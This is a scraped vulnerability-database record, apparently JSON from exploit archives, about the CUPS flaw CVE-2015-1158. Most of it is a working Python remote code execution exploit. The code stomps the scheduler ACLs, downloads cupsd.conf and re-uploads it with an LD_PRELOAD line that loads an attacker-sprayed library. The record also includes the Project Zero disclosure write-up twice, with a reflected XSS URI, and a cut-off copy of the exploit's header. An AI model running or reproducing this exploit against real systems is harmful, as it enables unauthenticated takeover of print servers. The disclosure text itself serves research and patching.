\" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n sendJobRequest = http_header2 + send_document_packet\r\n blah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest)\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\",\"job id: \" + jobid)\r\n return jobid\r\n \r\ndef stompACL(rhost, rport, printer):\r\n i = random.randint(1,1024)\r\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\r\n \r\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+1)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x16\" # val len: 22\r\n \"\\x00\\x06\" # length\r\n \"/admin\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n \r\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+2)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x1b\" # val len: 27\r\n \"\\x00\\x0b\" # length\r\n \"/admin/conf\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n \r\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n pretty(\"*\",\"stomping ACL\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\r\n time.sleep(1)\r\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\r\n \r\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"checking /admin\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\r\n res = txrx(rhost,rport,\"tcp\",http_header_check)\r\n pretty(\"*\",\"<:\\n\" + createDump(res))\r\n m = re.search('200 OK', res)\r\n if m is not None:\r\n pretty(\"+\",\"ACL stomp successful\")\r\n else:\r\n pretty(\"-\",\"exploit failed\")\r\n exit(1)\r\n \r\n \r\ndef getConfig(rhost, rport):\r\n i = random.randint(1,1024)\r\n original_config = \"\"\r\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n pretty(\"*\",\"grabbing configuration file....\")\r\n res = txrx(rhost,rport,\"tcp\",http_request)\r\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\r\n original_config = res_array[1]\r\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\r\n return original_config\r\n \r\ndef putConfig(rhost, rport, config):\r\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Keep-Alive\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"overwriting config...\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\r\n \r\ndef poisonConfig(config, name):\r\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\"\r\n return config\r\n \r\ndef main():\r\n rhost = None;\r\n noshell = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n elif opt in ('-c','--lib'):\r\n libpath = arg;\r\n elif opt in ('-f','--stomp-only'):\r\n noshell = 1;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n pretty(\"*\",\"locate available printer\")\r\n printer = locatePrinters(rhost, rport)\r\n pretty(\"*\",\"stomp ACL\")\r\n stompACL(rhost, rport, printer)\r\n if (noshell is not None):\r\n pretty(\"*\",\"fin\")\r\n exit(0)\r\n pretty(\"*\",\"prepare payload\")\r\n payload = preparePayload(libpath)\r\n pretty(\"*\",\"spray payload\")\r\n jobid = seedTarget(rhost, rport, printer, payload)\r\n pretty(\"*\",\"grab original config\")\r\n OG_config = getConfig(rhost, rport)\r\n pretty(\"*\",\"generate poison config\")\r\n evil_config = poisonConfig(OG_config, jobid)\r\n pretty(\"*\",\"upload poison config\")\r\n putConfig(rhost, rport, evil_config)\r\n pretty(\"*\",\"fin\")\r\n exit(0);\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26891"}, {"lastseen": "2017-12-31T21:02:32", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2015-06-23T00:00:00", "type": "zdt", "title": "CUPS 2.0.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2015-06-23T00:00:00", "id": "1337DAY-ID-23782", "href": "https://0day.today/exploit/description/23782", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\r\n \r\nAbstract\r\n \r\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\r\n \r\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\r\n \r\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\r\n \r\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\r\n \r\nSummary\r\n \r\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\r\n \r\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\r\n \r\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\r\nBackground\r\n \r\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\r\n \r\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\r\n \r\nscheduler/ipp.c:1626:\r\n \r\n /*\r\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\r\n */\r\n \r\n for (i = 0; i < attr->num_values; i ++)\r\n {\r\n _cupsStrFree(attr->values[i].string.text);\r\n attr->values[i].string.text = NULL;\r\n if (attr->values[i].string.language) \u2190 for all values in an attribute\r\n {\r\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\r\n attr->values[i].string.language = NULL;\r\n }\r\n }\r\n \r\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\r\n \r\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\r\n \r\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\r\n \r\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\r\n \r\n \r\nA Reflected XSS in the Web Interface (CVE-2015-1159)\r\n \r\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\r\n \r\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\r\n \r\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\r\n<>\"'&\r\n \r\n These are replaced with their HTML entity equivalents ('<' etc...).\r\n \r\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\r\n \r\n if (*s == '<')\r\n {\r\n /*\r\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\r\n */\r\n \r\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\r\n {\r\n fputs(\"<A HREF=\\\"\", out);\r\n s += 9;\r\n \r\n while (*s && *s != '\\\"')\r\n {\r\n if (*s == '&')\r\n fputs(\"&\", out);\r\n else\r\n putc(*s, out);\r\n \r\n s ++;\r\n }\r\n \r\n if (*s)\r\n s ++;\r\n \r\n fputs(\"\\\">\", out);\r\n }\r\n \r\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\r\n \r\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\r\n \r\nTake this example from templates/help-header.tmp:19:\r\n \r\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\r\n \r\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\r\n \r\nRequesting the following URI will demonstrate this reflected XSS:\r\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\r\n \r\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\r\n \r\n \r\nUpstream Fixes\r\n \r\nApple Fix (April 16, 2015):\r\nhttps://support.apple.com/kb/DL1807\r\n \r\nOfficial CUPS fix for downstream vendors (June 8, 2015):\r\nhttps://www.cups.org/str.php?L4609\r\nhttp://www.cups.org/blog.php?L1082+I0+Q\r\n \r\nProject Zero Bug\r\n \r\nFor those interested, the sample exploit can be found here:\r\n \r\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz\r\n \r\nDisclosure Timeline\r\n \r\nMarch 20th, 2015 - Initial notification to Apple\r\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\r\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\r\nJune 18th, 2015 - Disclosure + 90 days\r\nJune 19th, 2015 - P0 publication\r\n \r\nAttack Surface Reduction in CUPS 2.0.3+\r\n \r\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\r\n \r\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\r\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\r\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\r\n \r\nAcknowledgements\r\n \r\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\r\n \r\nConclusion\r\n \r\nNo one prints anything anymore anyways.\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23782"}], "exploitdb": [{"lastseen": "2016-02-04T05:36:17", "description": "CUPS < 2.0.3 - Multiple Vulnerabilities. CVE-2015-1158. Remote exploits for multiple platform", "published": "2015-06-22T00:00:00", "type": "exploitdb", "title": "CUPS < 2.0.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2015-06-22T00:00:00", "id": "EDB-ID:37336", "href": "https://www.exploit-db.com/exploits/37336/", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\r\n\r\nAbstract\r\n\r\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\r\n\r\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\r\n\r\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\r\n\r\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\r\n\r\nSummary\r\n\r\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\r\n\r\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\r\n\r\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\r\nBackground\r\n\r\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\r\n\r\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\r\n\r\nscheduler/ipp.c:1626:\r\n\r\n /*\r\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\r\n */\r\n\r\n for (i = 0; i < attr->num_values; i ++)\r\n {\r\n _cupsStrFree(attr->values[i].string.text);\r\n attr->values[i].string.text = NULL;\r\n if (attr->values[i].string.language) \u2190 for all values in an attribute\r\n {\r\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\r\n attr->values[i].string.language = NULL;\r\n }\r\n }\r\n\r\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\r\n\r\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\r\n\r\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\r\n\r\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\r\n\r\n\r\nA Reflected XSS in the Web Interface (CVE-2015-1159)\r\n\r\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\r\n\r\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\r\n\r\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\r\n<>\"'&\r\n\r\n These are replaced with their HTML entity equivalents ('<' etc...).\r\n\r\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\r\n\r\n if (*s == '<')\r\n {\r\n /*\r\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\r\n */\r\n\r\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\r\n {\r\n fputs(\"<A HREF=\\\"\", out);\r\n s += 9;\r\n\r\n while (*s && *s != '\\\"')\r\n {\r\n if (*s == '&')\r\n fputs(\"&\", out);\r\n else\r\n putc(*s, out);\r\n\r\n s ++;\r\n }\r\n\r\n if (*s)\r\n s ++;\r\n\r\n fputs(\"\\\">\", out);\r\n }\r\n\r\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\r\n\r\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\r\n\r\nTake this example from templates/help-header.tmp:19:\r\n\r\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\r\n\r\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\r\n\r\nRequesting the following URI will demonstrate this reflected XSS:\r\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\r\n\r\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\r\n\r\n\r\nUpstream Fixes\r\n\r\nApple Fix (April 16, 2015):\r\nhttps://support.apple.com/kb/DL1807\r\n\r\nOfficial CUPS fix for downstream vendors (June 8, 2015):\r\nhttps://www.cups.org/str.php?L4609\r\nhttp://www.cups.org/blog.php?L1082+I0+Q\r\n\r\nProject Zero Bug\r\n\r\nFor those interested, the sample exploit can be found here:\r\n\r\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz\r\n\r\nDisclosure Timeline\r\n\r\nMarch 20th, 2015 - Initial notification to Apple\r\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\r\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\r\nJune 18th, 2015 - Disclosure + 90 days\r\nJune 19th, 2015 - P0 publication\r\n\r\nAttack Surface Reduction in CUPS 2.0.3+\r\n\r\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\r\n\r\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\r\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\r\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\r\n\r\nAcknowledgements\r\n\r\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\r\n\r\nConclusion\r\n\r\nNo one prints anything anymore anyways.", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37336/"}, {"lastseen": "2017-02-03T08:59:45", "description": "CUPS < 2.0.3 - Remote Command Execution. CVE-2015-1158. Remote exploit for Linux platform", "published": "2017-02-03T00:00:00", "type": "exploitdb", "title": "CUPS < 2.0.3 - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "id": "EDB-ID:41233", "href": "https://www.exploit-db.com/exploits/41233/", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\r\n# Google Dork: n/a\r\n# Date: 2/2/17\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: cups.org\r\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\r\n# Version: <2.0.3\r\n# Tested on: Ubuntu 14/15\r\n# CVE : CVE-2015-1158\r\nimport os, re, socket, random, time, getopt, sys\r\nfrom socket import *\r\nfrom struct import *\r\n\r\ndef banner():\r\n print '''\r\n lol ty google\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\ngithub.com/0x00string/oldays/CVE-2015-1158.py\r\n'''\r\n\r\ndef usage ():\r\n print 